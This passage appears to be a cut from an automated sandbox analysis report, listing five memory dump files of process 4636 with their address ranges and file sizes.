              • memory/4636-128-0x00000000012F0000-0x00000000012FC000-memory.dmp

                Filesize

                48KB

              • memory/4636-122-0x000000001C320000-0x000000001C370000-memory.dmp

                Filesize

                320KB

              • memory/4636-119-0x00000000012D0000-0x00000000012DE000-memory.dmp

                Filesize

                56KB

              • memory/4636-117-0x00000000008D0000-0x0000000000AB6000-memory.dmp

                Filesize

                1.9MB

              • memory/4636-126-0x00000000012E0000-0x00000000012EE000-memory.dmp

                Filesize

                56KB